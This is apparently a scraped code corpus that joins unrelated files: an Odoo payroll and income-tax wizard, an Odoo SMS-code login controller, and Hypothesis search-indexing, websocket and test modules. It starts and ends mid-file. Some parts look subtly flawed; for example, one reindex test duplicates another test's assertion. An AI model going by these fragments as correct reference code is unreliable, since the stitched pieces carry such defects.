payrolls.write({
                        # (2, id) removes one linked record at a time, so expand the id lists
                        'structure_ids': [(2, line_id) for line_id in payrolls.structure_ids.ids],
                        'performance_ids': [(2, line_id) for line_id in payrolls.performance_ids.ids],
                        'statement_ids': [(2, line_id) for line_id in payrolls.statement_ids.ids],
})
payrolls.write(payroll_data)
else:
raise UserError("核算单:({})已不是待审核确认阶段,请先反审核后再重新计算!".format(payrolls[0].name))
return {'type': 'ir.actions.act_window_close'}
# 计算个税
@api.model
def _compute_employee_tax(self, pay_wage, payroll_data, emp, date_code):
"""
:param pay_wage:应发工资
:param payroll_data:
:param emp:
:param date_code:期间
:return:
"""
month_code = date_code[5:7]
# 获取个税明细
emp_tax = self.env['wage.employee.tax.details'].sudo().search([('employee_id', '=', emp.id), ('year', '=', date_code[:4])], limit=1)
if not emp_tax:
raise UserError("员工'%s'不存在年度'%s'个税明细!请先创建或初始化..." % (emp.name, date_code[:4]))
# 获取专项附加扣除
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
deduction = self.env['wage.special.additional.deduction'].sudo().search(domain, limit=1)
cumulative_expenditure_deduction = 0
cumulative_support_for_the_elderly = 0
cumulative_continuing_education_deduction = 0
cumulative_home_loan_interest_deduction = 0
cumulative_housing_rental_expense_deduction = 0
if deduction:
cumulative_expenditure_deduction = deduction.cumulative_expenditure_deduction
cumulative_support_for_the_elderly = deduction.cumulative_support_for_the_elderly
cumulative_continuing_education_deduction = deduction.cumulative_continuing_education_deduction
cumulative_home_loan_interest_deduction = deduction.cumulative_home_loan_interest_deduction
cumulative_housing_rental_expense_deduction = deduction.cumulative_housing_rental_expense_deduction
# 累计个税抵扣总额
total_tax_deduction = cumulative_expenditure_deduction + cumulative_support_for_the_elderly + cumulative_continuing_education_deduction + \
cumulative_home_loan_interest_deduction + cumulative_housing_rental_expense_deduction
cumulative_tax_pay = 0 # 累计计税工资
exemption = 0 # 累计免征额
cumulative_actual_tax = 0 # 累计实际个税
lsy_tax_wage = 0 # 历史月份计税工资
for line in emp_tax.line_ids:
# 获取月份的前一个月
if int(month_code) == 1:
exemption = 5000
elif int(month_code)-1 == int(line.month):
exemption += line.accumulated_exemption + 5000
cumulative_tax_pay = line.cumulative_tax_pay + pay_wage
cumulative_actual_tax = line.cumulative_actual_tax
# 获取累计计税工资、累计实际个税
if int(line.month) < int(month_code):
lsy_tax_wage += line.taxable_salary_this_month
# 累计应税工资 = 本月计税工资 + 历史月份计税工资 - 累计个税抵扣 - 累计免税额
cumulative_tax = pay_wage + lsy_tax_wage - total_tax_deduction - exemption
# 累计应扣个税 税率 速算扣除数
accumulated_deductible_tax, tax, quick_deduction = self._compute_cumulative_tax_payable_by_number(cumulative_tax)
# 本月个税 = 累计应扣个税 - 累计实际个税
this_months_tax = accumulated_deductible_tax - cumulative_actual_tax
# 创建该员工个税明细
tax_data = {
'month': month_code,
'taxable_salary_this_month': pay_wage,
'cumulative_tax_pay': cumulative_tax_pay,
'cumulative_tax_deduction': total_tax_deduction,
'accumulated_exemption': exemption,
'cumulative_taxable_wage': cumulative_tax,
'tax': tax,
'quick_deduction': quick_deduction,
'accumulated_deductible_tax': accumulated_deductible_tax,
'this_months_tax': this_months_tax,
'cumulative_actual_tax': accumulated_deductible_tax,
}
emp_tax.set_employee_tax_detail(month_code, tax_data)
# 将个税明细封装到薪资核算data中
payroll_data.update({
'cumulative_expenditure_deduction': cumulative_expenditure_deduction,
'cumulative_home_loan_interest_deduction': cumulative_home_loan_interest_deduction,
'cumulative_housing_rental_expense_deduction': cumulative_housing_rental_expense_deduction,
'cumulative_support_for_the_elderly': cumulative_support_for_the_elderly,
'cumulative_continuing_education_deduction': cumulative_continuing_education_deduction,
'cumulative_total_tax_deduction': total_tax_deduction, # 累计个税抵扣总额
'taxable_salary_this_month': pay_wage, # 本月计税工资
'cumulative_tax_pay': cumulative_tax_pay, # 累计计税工资
'tax_rate': tax, # 税率
'quick_deduction': quick_deduction, # 速算扣除数
'this_months_tax': this_months_tax, # 本月个税
'cumulative_tax': cumulative_tax, # 累计个税
'real_wage': pay_wage - this_months_tax, # 实发工资
})
return payroll_data
@api.model
def _compute_cumulative_tax_payable_by_number(self, number):
"""
        Compute the accumulated tax payable from the "accumulated taxable wage".
        Withholding rate table for individual income tax on residents' wages and salaries:
        Level  Accumulated taxable wage      Rate (%)  Quick deduction
        1      up to 36000                   3         0
        2      over 36000 up to 144000       10        2520
        3      over 144000 up to 300000      20        16920
        4      over 300000 up to 420000      25        31920
        5      over 420000 up to 660000      30        52920
        6      over 660000 up to 960000      35        85920
        7      over 960000                   45        181920
        :param number: accumulated taxable wage
        :return: (accumulated tax payable, withholding rate, quick deduction)
"""
result = 0.0
tax = 0
quick_deduction = 0
if number <= 36000:
result = number * 0.03 - 0
tax = 0.03
quick_deduction = 0
elif 36000 < number <= 144000:
result = number * 0.10 - 2520
tax = 0.10
quick_deduction = 2520
elif 144000 < number <= 300000:
result = number * 0.20 - 16920
tax = 0.20
quick_deduction = 16920
elif 300000 < number <= 420000:
result = number * 0.25 - 31920
tax = 0.25
quick_deduction = 31920
elif 420000 < number <= 660000:
result = number * 0.30 - 52920
tax = 0.30
quick_deduction = 52920
elif 660000 < number <= 960000:
result = number * 0.35 - 85920
tax = 0.35
quick_deduction = 85920
elif number >= 960000:
result = number * 0.45 - 181920
tax = 0.45
quick_deduction = 181920
return result, tax, quick_deduction
class PayrollAccountingToPayslipTransient(models.TransientModel):
_name = 'wage.payroll.accounting.to.payslip.transient'
_description = "生成工资条"
start_date = fields.Date(string=u'所属期起', required=True)
end_date = fields.Date(string=u'所属期止', required=True)
date_code = fields.Char(string='期间')
emp_ids = fields.Many2many('hr.employee', string=u'员工', required=True)
all_emp = fields.Boolean(string=u'全部员工?')
@api.onchange('all_emp')
def onchange_all_emp(self):
"""
获取全部员工
:return:
"""
if self.all_emp:
employees = self.env['hr.employee'].search([])
self.emp_ids = [(6, 0, employees.ids)]
else:
            self.emp_ids = False  # clear the selection, as the payroll wizard above does
@api.onchange('start_date')
def _alter_date_code(self):
"""
根据日期生成期间代码
:return:
"""
for res in self:
if res.start_date:
start_date = str(res.start_date)
res.date_code = "{}/{}".format(start_date[:4], start_date[5:7])
def create_employee_payslip(self):
"""
生成工资条
:return:
"""
self.ensure_one()
start_date = str(self.start_date)
date_code = "{}/{}".format(start_date[:4], start_date[5:7])
for emp in self.emp_ids:
payroll_data = {
'start_date': self.start_date,
'end_date': self.end_date,
'date_code': date_code,
'employee_id': emp.id,
'department_id': emp.department_id.id if emp.department_id else False,
'job_id': emp.job_id.id if emp.job_id else False,
}
# 获取薪资核算明细
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
payroll = self.env['wage.payroll.accounting'].search(domain, limit=1)
if payroll:
payroll_data.update({
'base_wage': payroll.base_wage, # 基本工资
'structure_wage': 0, # 薪资项目
'absence_sum': payroll.absence_sum, # 缺勤扣款合计
'performance_sum': payroll.performance_sum, # 绩效合计
'overtime_sum': payroll.overtime_sum, # 加班费合计
'attendance_sum': payroll.attendance_sum, # 打卡扣款合计
'this_months_tax': payroll.this_months_tax, # 本月个税
'pay_wage': payroll.pay_wage, # 应发工资
'real_wage': payroll.real_wage, # 实发工资
'structure_sum': payroll.structure_sum, # 薪资项目合计
})
# 创建工资单
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
payrolls = self.env['odoo.wage.payslip'].search(domain)
if not payrolls:
self.env['odoo.wage.payslip'].sudo().create(payroll_data)
else:
payrolls.sudo().write(payroll_data)
action = self.env.ref('odoo_wage_manage.odoo_wage_payslip_action')
return action.read()[0]
class SendPayrollAccountingToPayslipEmailTransient(models.TransientModel):
_name = 'send.wage.payroll.to.email.transient'
_description = "通过EMAIL发送核算明细至员工"
wage_date = fields.Date(string=u'核算月份', required=True)
date_code = fields.Char(string='期间代码')
payroll_ids = fields.Many2many('wage.payroll.accounting', relation='payroll_accounting_email_wage_payroll_accounting_rel', string=u'核算明细')
all_payroll = fields.Boolean(string=u'所有核算明细?')
@api.onchange('wage_date')
def _alter_date_code(self):
"""
根据日期生成期间代码
:return:
"""
for res in self:
if res.wage_date:
wage_date = str(res.wage_date)
res.date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
def send_email_now(self):
"""
批量发送核算明细至员工email,注意不是立即发送,通过邮件:EMail队列管理器进行发送
:return:
"""
self.ensure_one()
template_id = self.env.ref('odoo_wage_manage.wage_payroll_accounting_email_template', raise_if_not_found=False)
if not template_id:
return False
wage_date = str(self.wage_date)
date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
payrolls = self.env['wage.payroll.accounting'].sudo().search([('date_code', '=', date_code)])
for payroll in payrolls:
if payroll.employee_id.work_email:
logging.info("email至%s" % payroll.name)
template_id.sudo().with_context(lang=self.env.context.get('lang')).send_mail(payroll.id, force_send=False)
payroll.email_state = True
```
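For a quick sanity check of the bracket logic in `_compute_cumulative_tax_payable_by_number`, the arithmetic can be exercised outside Odoo. The sketch below is illustrative only: it copies the bracket constants from the method above into a standalone function (`cumulative_tax_payable` is a made-up name) and runs a small worked example.
```python
# Standalone sketch of the withholding-rate lookup above, for a worked example only.
# The bracket constants mirror the docstring table; nothing here touches Odoo.
BRACKETS = [
    (36000, 0.03, 0),
    (144000, 0.10, 2520),
    (300000, 0.20, 16920),
    (420000, 0.25, 31920),
    (660000, 0.30, 52920),
    (960000, 0.35, 85920),
    (float("inf"), 0.45, 181920),
]
def cumulative_tax_payable(number):
    for upper, rate, quick_deduction in BRACKETS:
        if number <= upper:
            return number * rate - quick_deduction, rate, quick_deduction
# Worked example: an accumulated taxable wage of 50000 sits in the 10% bracket,
# so the accumulated tax payable is 50000 * 0.10 - 2520 = 2480.
print(cumulative_tax_payable(50000))  # (2480.0, 0.1, 2520)
print(cumulative_tax_payable(36000))  # (1080.0, 0.03, 0)
```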
#### File: sms_base/controllers/sms_controller.py
```python
import datetime
import json
import logging
import werkzeug
from werkzeug.exceptions import BadRequest
from odoo import SUPERUSER_ID, api, http, _
from odoo import registry as registry_get
from odoo.addons.auth_oauth.controllers.main import OAuthController as Controller
from odoo.addons.web.controllers.main import (login_and_redirect, ensure_db)
from odoo.exceptions import AccessDenied
from odoo.http import request
_logger = logging.getLogger(__name__)
class OAuthController(Controller):
@http.route('/web/login/sms', type='http', auth='public', website=True, sitemap=False)
def web_odoo_sms_login(self, **kw):
"""
短信登录入口,点击后返回到验证码界面
:param kw:
:return:
"""
if request.session.uid:
request.session.uid = False
if request.session.login:
request.session.login = False
data = {'code_maxlength': 6} # 验证码默认最大长度
return request.render('sms_base.sms_login_signup', data)
@http.route('/web/sms/send/code', type='http', auth="public", website=True, sitemap=False)
def web_sms_send_code(self, **kw):
"""
发送验证码
:param kw:
:return:
"""
values = request.params.copy()
user_phone = values.get('user_phone')
if not user_phone:
return json.dumps({'state': False, 'msg': "手机号码不能为空!"})
_logger.info("手机号码:{}正在尝试发送验证码".format(user_phone))
# 验证员工是否有此手机号
domain = [('user_phone', '=', user_phone)]
user = request.env['res.users'].sudo().search(domain, limit=1)
if not user:
return json.dumps({'state': False, 'msg': "抱歉,您的手机号未注册,请联系管理员完善信息!"})
# 获取服务商
partners = request.env['sms.partner'].sudo().get_partners_priority(user)
if not partners:
return json.dumps({"state": False, 'msg': "系统未找到可用的短信服务商,请联系管理员维护!"})
# 使用服务商的发送验证码函数
result = partners.sudo().send_message_code(user, user_phone, 'login')
if result.get('state'):
return json.dumps({"state": True, 'msg': "验证码已发送,请注意查收短信!"})
return json.dumps({"state": False, 'msg': result.get('msg')})
@http.route('/web/sms/user/login', type='http', auth="public", website=True, sitemap=False)
def web_sms_user_login(self, **kw):
"""
验证登录验证码
:param kw:
:return:
"""
values = request.params.copy()
user_phone = values.get('phone')
code = values.get('code')
if not user_phone or not code:
return json.dumps({'state': False, 'msg': "手机号码和验证码不正确!"})
# 读取员工
user_domain = [('user_phone', '=', user_phone)]
user = request.env['res.users'].sudo().search(user_domain, limit=1)
if not user:
return json.dumps({'state': False, 'msg': "抱歉,您的手机号未注册,请联系管理员完善信息!"})
# 检查验证码和登录手机有效性
domain = [('phone', '=', user_phone), ('code', '=', code), ('state', '=', 'normal'), ('company_id', '=', user.company_id.id)]
records = request.env['sms.verification.record'].sudo().search(domain)
if not records:
return json.dumps({'state': False, 'msg': "验证码不正确,请重新输入!"})
# 检查时效
for record in records:
if datetime.datetime.now() > record.end_time:
record.sudo().write({'state': 'invalid'})
return json.dumps({'state': False, 'msg': "验证码已失效!请重新获取!"})
records.sudo().write({'state': 'invalid'})
# 验证通过执行登录操作
return self.do_post_login(user_phone)
def do_post_login(self, user_phone):
"""
执行登录
:param user_phone:
:return:
"""
if request.session.uid:
request.session.uid = False
if request.session.login:
request.session.login = False
ensure_db()
dbname = request.session.db
if not http.db_filter([dbname]):
return BadRequest()
registry = registry_get(dbname)
with registry.cursor() as cr:
try:
env = api.Environment(cr, SUPERUSER_ID, {})
credentials = env['res.users'].sudo().auth_oauth_sms('sms', user_phone)
cr.commit()
url = '/web'
resp = login_and_redirect(*credentials, redirect_url=url)
if werkzeug.urls.url_parse(resp.location).path == '/web' and not request.env.user.has_group('base.group_user'):
resp.location = '/'
return json.dumps({'state': True, 'msg': "登录成功"})
except AttributeError:
return json.dumps({'state': False, 'msg': "未在数据库'%s'上安装auth_signup:oauth注册已取消" % (dbname)})
except AccessDenied:
_logger.info('>>>SMS-OAuth2: 访问被拒绝,在存在有效会话的情况下重定向到主页,而未设置Cookie')
url = "/web/login?oauth_error=3"
redirect = werkzeug.utils.redirect(url, 303)
redirect.autocorrect_location_header = False
return redirect
except Exception as e:
return json.dumps({'state': False, 'msg': "OAuth2: %s" % str(e)})
```
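The two routes above form a two-step flow: `/web/sms/send/code` sends a code to a registered phone, then `/web/sms/user/login` checks the phone/code pair and performs the login. A minimal client-side sketch using `requests`; the base URL and phone number are placeholders, and the JSON replies are whatever strings the controllers return.
```python
# Illustrative client for the SMS login endpoints above; BASE_URL and the phone
# number are placeholders, and both endpoints answer with JSON-encoded strings.
import json
import requests
BASE_URL = "http://localhost:8069"  # assumed local Odoo instance
session = requests.Session()
# Step 1: ask the server to send a verification code to the phone.
resp = session.get(BASE_URL + "/web/sms/send/code", params={"user_phone": "13800000000"})
print(json.loads(resp.text))  # e.g. {"state": True, "msg": "..."}
# Step 2: send back the code the user received to complete the login.
code = input("verification code: ")
resp = session.get(BASE_URL + "/web/sms/user/login", params={"phone": "13800000000", "code": code})
print(json.loads(resp.text))
```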
#### File: sms_base/models/verification_record.py
```python
import logging
from odoo import api, fields, models
import datetime
_logger = logging.getLogger(__name__)
class SmsVerificationRecord(models.Model):
_description = '验证码记录'
_name = 'sms.verification.record'
_rec_name = 'sid'
_order = 'id'
RECORDTYPE = [
('login', '用户登录/注册'),
('passwd', '<PASSWORD>'),
]
partner_id = fields.Many2one(comodel_name='sms.partner', string=u'服务商', ondelete='cascade', index=True)
template_id = fields.Many2one(comodel_name='sms.template', string=u'模板', ondelete='cascade', index=True)
user_id = fields.Many2one(comodel_name='res.users', string=u'用户', index=True)
phone = fields.Char(string='手机号码', index=True)
sid = fields.Char(string='唯一标识')
code = fields.Char(string='验证码')
send_time = fields.Datetime(string=u'发送时间', default=fields.Datetime.now)
end_time = fields.Datetime(string=u'截至时间')
timeout = fields.Integer(string='有效时长(分钟)', default=30)
state = fields.Selection(string=u'状态', selection=[('normal', '未验证'), ('invalid', '已验证'), ], default='normal')
ttype = fields.Selection(string="消息类型", selection=RECORDTYPE)
company_id = fields.Many2one(comodel_name="res.company", string="所属公司")
@api.model
def create(self, values):
        values['end_time'] = datetime.datetime.now() + datetime.timedelta(minutes=values.get('timeout', 30))  # fall back to the field default when timeout is not passed
return super(SmsVerificationRecord, self).create(values)
class SmsSendRecord(models.Model):
_name = 'sms.send.record'
_description = '发送记录'
_rec_name = 'create_date'
_order = 'id'
TEMPLATETYPE = [
('new_user', '新用户通知'),
('up_pwd', '<PASSWORD>'),
('notice', '消息通知'),
]
create_date = fields.Datetime(string="创建时间", default=fields.Datetime.now, index=True)
partner_id = fields.Many2one(comodel_name="sms.partner", string="服务商", index=True, ondelete='cascade')
signature_id = fields.Many2one(comodel_name="sms.signature", string="短信签名", ondelete='cascade', index=True)
template_id = fields.Many2one(comodel_name='sms.template', string=u'模板', ondelete='cascade', index=True)
code = fields.Char(string="模板代码", index=True)
user_id = fields.Many2one(comodel_name='res.users', string=u'系统用户', index=True)
phone = fields.Char(string="手机号码", index=True)
ttype = fields.Selection(string="用于", selection=TEMPLATETYPE, default='code')
company_id = fields.Many2one(comodel_name="res.company", string="所属公司")
``` |
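`create()` above stamps each record with an `end_time` computed from `timeout`, and the login controller flips records to `invalid` once `datetime.datetime.now()` passes that stamp. A tiny standalone illustration of that expiry rule (plain Python, no Odoo; the values are made up):
```python
# Plain-Python illustration of the expiry rule used by sms.verification.record:
# a code stays valid for `timeout` minutes after it was sent.
import datetime
def is_expired(send_time, timeout_minutes=30, now=None):
    now = now or datetime.datetime.now()
    end_time = send_time + datetime.timedelta(minutes=timeout_minutes)
    return now > end_time
sent = datetime.datetime.now() - datetime.timedelta(minutes=45)
print(is_expired(sent))  # True  -> the record would be written to state='invalid'
print(is_expired(datetime.datetime.now()))  # False -> the code is still usable
```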
{
"source": "13625025773/h",
"score": 3
} |
#### File: h/search/index.py
```python
import logging
import time
from collections import namedtuple
import sqlalchemy as sa
from elasticsearch import helpers as es_helpers
from sqlalchemy.orm import subqueryload
from h import models, presenters
from h.events import AnnotationTransformEvent
from h.util.query import column_windows
log = logging.getLogger(__name__)
ES_CHUNK_SIZE = 100
PG_WINDOW_SIZE = 2000
class Window(namedtuple("Window", ["start", "end"])):
pass
def index(es, annotation, request, target_index=None):
"""
Index an annotation into the search index.
A new annotation document will be created in the search index or,
if the index already contains an annotation document with the same ID as
the given annotation then it will be updated.
:param es: the Elasticsearch client object to use
:type es: h.search.Client
:param annotation: the annotation to index
:type annotation: h.models.Annotation
:param target_index: the index name, uses default index if not given
:type target_index: unicode
"""
presenter = presenters.AnnotationSearchIndexPresenter(annotation, request)
annotation_dict = presenter.asdict()
event = AnnotationTransformEvent(request, annotation, annotation_dict)
request.registry.notify(event)
if target_index is None:
target_index = es.index
es.conn.index(
index=target_index,
doc_type=es.mapping_type,
body=annotation_dict,
id=annotation_dict["id"],
)
def delete(es, annotation_id, target_index=None, refresh=False):
"""
Mark an annotation as deleted in the search index.
This will write a new body that only contains the ``deleted`` boolean field
with the value ``true``. It allows us to rely on Elasticsearch to complain
about dubious operations while re-indexing when we use `op_type=create`.
:param es: the Elasticsearch client object to use
:type es: h.search.Client
:param annotation_id: the annotation id whose corresponding document to
delete from the search index
:type annotation_id: str
:param target_index: the index name, uses default index if not given
:type target_index: unicode
:param refresh: Force this deletion to be immediately visible to search operations
:type refresh: bool
"""
if target_index is None:
target_index = es.index
es.conn.index(
index=target_index,
doc_type=es.mapping_type,
body={"deleted": True},
id=annotation_id,
refresh=refresh,
)
class BatchIndexer:
"""
A convenience class for reindexing all annotations from the database to
the search index.
"""
def __init__(self, session, es_client, request, target_index=None, op_type="index"):
self.session = session
self.es_client = es_client
self.request = request
self.op_type = op_type
# By default, index into the open index
if target_index is None:
self._target_index = self.es_client.index
else:
self._target_index = target_index
def index(
self, annotation_ids=None, windowsize=PG_WINDOW_SIZE, chunk_size=ES_CHUNK_SIZE
):
"""
Reindex annotations.
:param annotation_ids: a list of ids to reindex, reindexes all when `None`.
:type annotation_ids: collection
:param windowsize: the number of annotations to index in between progress log statements
:type windowsize: integer
:param chunk_size: the number of docs in one chunk sent to ES
:type chunk_size: integer
:returns: a set of errored ids
:rtype: set
"""
if annotation_ids is None:
annotations = _all_annotations(session=self.session, windowsize=windowsize)
else:
annotations = _filtered_annotations(
session=self.session, ids=annotation_ids
)
# Report indexing status as we go
annotations = _log_status(annotations, log_every=windowsize)
indexing = es_helpers.streaming_bulk(
self.es_client.conn,
annotations,
chunk_size=chunk_size,
raise_on_error=False,
expand_action_callback=self._prepare,
)
errored = set()
for ok, item in indexing:
if not ok:
status = item[self.op_type]
was_doc_exists_err = "document already exists" in status["error"]
if self.op_type == "create" and was_doc_exists_err:
continue
errored.add(status["_id"])
return errored
def _prepare(self, annotation):
action = {
self.op_type: {
"_index": self._target_index,
"_type": self.es_client.mapping_type,
"_id": annotation.id,
}
}
data = presenters.AnnotationSearchIndexPresenter(
annotation, self.request
).asdict()
event = AnnotationTransformEvent(self.request, annotation, data)
self.request.registry.notify(event)
return (action, data)
def _all_annotations(session, windowsize=2000):
# This is using a windowed query for loading all annotations in batches.
# It is the most performant way of loading a big set of records from
# the database while still supporting eagerloading of associated
# document data.
windows = column_windows(
session=session,
column=models.Annotation.updated, # implicit ASC
windowsize=windowsize,
where=_annotation_filter(),
)
query = _eager_loaded_annotations(session).filter(_annotation_filter())
for window in windows:
for a in query.filter(window):
yield a
def _filtered_annotations(session, ids):
annotations = (
_eager_loaded_annotations(session)
.execution_options(stream_results=True)
.filter(_annotation_filter())
.filter(models.Annotation.id.in_(ids))
)
for a in annotations:
yield a
def _annotation_filter():
"""Default filter for all search indexing operations."""
return sa.not_(models.Annotation.deleted)
def _eager_loaded_annotations(session):
return session.query(models.Annotation).options(
subqueryload(models.Annotation.document).subqueryload(
models.Document.document_uris
),
subqueryload(models.Annotation.document).subqueryload(models.Document.meta),
subqueryload(models.Annotation.moderation),
subqueryload(models.Annotation.thread).load_only("id"),
)
def _log_status(stream, log_every=1000):
i = 0
then = time.time()
for item in stream:
yield item
i += 1
if i % log_every == 0:
now = time.time()
delta = now - then
then = now
rate = log_every / delta
log.info("indexed {:d}k annotations, rate={:.0f}/s".format(i // 1000, rate))
```
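The module exposes two granularities: `index()`/`delete()` for a single annotation and `BatchIndexer` for bulk reindexing over windowed queries. A hedged usage sketch; the `session`, `es_client` and `request` objects are assumed to be supplied by the surrounding h/Pyramid application and are not constructed here.
```python
# Illustrative only: driving BatchIndexer for a full reindex. `session`, `es_client`
# and `request` are assumed to come from the surrounding h application.
from h.search.index import BatchIndexer
def reindex_everything(session, es_client, request):
    # op_type="index" overwrites existing documents; with op_type="create" the
    # "document already exists" errors are silently skipped instead.
    indexer = BatchIndexer(session, es_client, request, op_type="index")
    errored = indexer.index()  # no ids given -> walk every annotation in windows
    if errored:
        print("failed to index %d annotations" % len(errored))  # errored ids come back as a set
    return errored
```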
#### File: h/streamer/websocket.py
```python
import copy
import json
import logging
import weakref
from collections import namedtuple
import jsonschema
from gevent.queue import Full
from ws4py.websocket import WebSocket as _WebSocket
from h import storage
from h.streamer.filter import FILTER_SCHEMA, SocketFilter
log = logging.getLogger(__name__)
# Mapping incoming message type to handler function. Handlers are added inline
# below.
MESSAGE_HANDLERS = {}
# An incoming message from a WebSocket client.
class Message(namedtuple("Message", ["socket", "payload"])):
def reply(self, payload, ok=True):
"""
Send a response to this message.
Sends a reply message back to the client, with the passed `payload`
and reporting status `ok`.
"""
reply_to = self.payload.get("id")
# Short-circuit if message is missing an ID or has a non-numeric ID.
if not isinstance(reply_to, (int, float)):
return
data = copy.deepcopy(payload)
data["ok"] = ok
data["reply_to"] = reply_to
self.socket.send_json(data)
class WebSocket(_WebSocket):
# All instances of WebSocket, allowing us to iterate over open websockets
instances = weakref.WeakSet()
# Instance attributes
client_id = None
filter = None
query = None
def __init__(self, sock, protocols=None, extensions=None, environ=None):
super(WebSocket, self).__init__(
sock,
protocols=protocols,
extensions=extensions,
environ=environ,
heartbeat_freq=30.0,
)
self.authenticated_userid = environ["h.ws.authenticated_userid"]
self.effective_principals = environ["h.ws.effective_principals"]
self.registry = environ["h.ws.registry"]
self._work_queue = environ["h.ws.streamer_work_queue"]
def __new__(cls, *args, **kwargs):
instance = super(WebSocket, cls).__new__(cls)
cls.instances.add(instance)
return instance
def received_message(self, msg):
try:
payload = json.loads(msg.data)
except ValueError:
self.close(reason="invalid message format")
return
try:
self._work_queue.put(Message(socket=self, payload=payload), timeout=0.1)
except Full:
log.warning(
"Streamer work queue full! Unable to queue message from "
"WebSocket client having waited 0.1s: giving up."
)
def closed(self, code, reason=None):
try:
self.instances.remove(self)
except KeyError:
pass
def send_json(self, payload):
if not self.terminated:
self.send(json.dumps(payload))
def handle_message(message, session=None):
"""
Handle an incoming message from a client websocket.
Receives a :py:class:`~h.streamer.websocket.Message` instance, which holds
references to the :py:class:`~h.streamer.websocket.WebSocket` instance
associated with the client connection, as well as the message payload.
It updates state on the :py:class:`~h.streamer.websocket.WebSocket`
instance in response to the message content.
It may also passed a database session which *must* be used for any
communication with the database.
"""
payload = message.payload
type_ = payload.get("type")
# FIXME: This code is here to tolerate old and deprecated message formats.
if type_ is None:
if "messageType" in payload and payload["messageType"] == "client_id":
type_ = "client_id"
if "filter" in payload:
type_ = "filter"
# N.B. MESSAGE_HANDLERS[None] handles both incorrect and missing message
# types.
handler = MESSAGE_HANDLERS.get(type_, MESSAGE_HANDLERS[None])
handler(message, session=session)
def handle_client_id_message(message, session=None):
"""A client telling us its client ID."""
if "value" not in message.payload:
message.reply(
{
"type": "error",
"error": {"type": "invalid_data", "description": '"value" is missing'},
},
ok=False,
)
return
message.socket.client_id = message.payload["value"]
MESSAGE_HANDLERS["client_id"] = handle_client_id_message # noqa: E305
def handle_filter_message(message, session=None):
"""A client updating its streamer filter."""
if "filter" not in message.payload:
message.reply(
{
"type": "error",
"error": {"type": "invalid_data", "description": '"filter" is missing'},
},
ok=False,
)
return
filter_ = message.payload["filter"]
try:
jsonschema.validate(filter_, FILTER_SCHEMA)
except jsonschema.ValidationError:
message.reply(
{
"type": "error",
"error": {
"type": "invalid_data",
"description": "failed to parse filter",
},
},
ok=False,
)
return
if session is not None:
# Add backend expands for clauses
_expand_clauses(session, filter_)
SocketFilter.set_filter(message.socket, filter_)
MESSAGE_HANDLERS["filter"] = handle_filter_message # noqa: E305
def handle_ping_message(message, session=None):
"""A client requesting a pong."""
message.reply({"type": "pong"})
MESSAGE_HANDLERS["ping"] = handle_ping_message # noqa: E305
def handle_whoami_message(message, session=None):
"""A client requesting information on its auth state."""
message.reply({"type": "whoyouare", "userid": message.socket.authenticated_userid})
MESSAGE_HANDLERS["whoami"] = handle_whoami_message # noqa: E305
def handle_unknown_message(message, session=None):
"""Message type missing or not recognised."""
type_ = json.dumps(message.payload.get("type"))
message.reply(
{
"type": "error",
"error": {
"type": "invalid_type",
"description": "invalid message type: " "{:s}".format(type_),
},
},
ok=False,
)
MESSAGE_HANDLERS[None] = handle_unknown_message # noqa: E305
def _expand_clauses(session, filter_):
for clause in filter_["clauses"]:
if "field" in clause and clause["field"] == "/uri":
_expand_uris(session, clause)
def _expand_uris(session, clause):
uris = clause["value"]
expanded = set()
if not isinstance(uris, list):
uris = [uris]
for item in uris:
expanded.update(storage.expand_uri(session, item))
clause["value"] = list(expanded)
```
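New message types are wired in by registering a callable in `MESSAGE_HANDLERS`, exactly as the module does inline for `client_id`, `filter`, `ping` and `whoami`. A small sketch adding a hypothetical `echo` type (this type does not exist in h; it is purely illustrative):
```python
# Hypothetical extra handler following the same registration pattern as above;
# the "echo" message type is invented for illustration and is not part of h.
from h.streamer.websocket import MESSAGE_HANDLERS
def handle_echo_message(message, session=None):
    """Reply with whatever payload field the client sent us."""
    message.reply({"type": "echo", "payload": message.payload.get("data")})
MESSAGE_HANDLERS["echo"] = handle_echo_message
```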
#### File: h/tasks/indexer_test.py
```python
import datetime
from unittest import mock
import pytest
from h_matchers import Any
from h.tasks import indexer
class FakeSettingsService:
def __init__(self):
self._data = {}
def get(self, key):
return self._data.get(key)
def put(self, key, value):
self._data[key] = value
class TestAddAnnotation:
def test_it_fetches_the_annotation(self, storage, annotation, celery):
id_ = "test-annotation-id"
storage.fetch_annotation.return_value = annotation
indexer.add_annotation(id_)
storage.fetch_annotation.assert_called_once_with(celery.request.db, id_)
def test_it_calls_index_with_annotation(self, storage, annotation, index, celery):
id_ = "test-annotation-id"
storage.fetch_annotation.return_value = annotation
indexer.add_annotation(id_)
index.assert_any_call(celery.request.es, annotation, celery.request)
def test_it_skips_indexing_when_annotation_cannot_be_loaded(
self, storage, index, celery
):
storage.fetch_annotation.return_value = None
indexer.add_annotation("test-annotation-id")
assert index.called is False
def test_during_reindex_adds_to_current_index(
self, storage, annotation, index, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
storage.fetch_annotation.return_value = annotation
indexer.add_annotation("test-annotation-id")
index.assert_any_call(
celery.request.es,
annotation,
celery.request,
target_index="hypothesis-xyz123",
)
def test_during_reindex_adds_to_new_index(
self, storage, annotation, index, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
storage.fetch_annotation.return_value = annotation
indexer.add_annotation("test-annotation-id")
index.assert_any_call(
celery.request.es,
annotation,
celery.request,
target_index="hypothesis-xyz123",
)
def test_it_indexes_thread_root(self, storage, reply, delay):
storage.fetch_annotation.return_value = reply
indexer.add_annotation("test-annotation-id")
delay.assert_called_once_with("root-id")
@pytest.fixture
def annotation(self):
return mock.Mock(spec_set=["is_reply"], is_reply=False)
@pytest.fixture
def reply(self):
return mock.Mock(
spec_set=["is_reply", "thread_root_id"],
is_reply=True,
thread_root_id="root-id",
)
@pytest.fixture
def delay(self, patch):
return patch("h.tasks.indexer.add_annotation.delay")
class TestDeleteAnnotation:
def test_it_deletes_from_index(self, delete, celery):
id_ = "test-annotation-id"
indexer.delete_annotation(id_)
delete.assert_any_call(celery.request.es, id_)
def test_during_reindex_deletes_from_current_index(
self, delete, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
indexer.delete_annotation("test-annotation-id")
delete.assert_any_call(
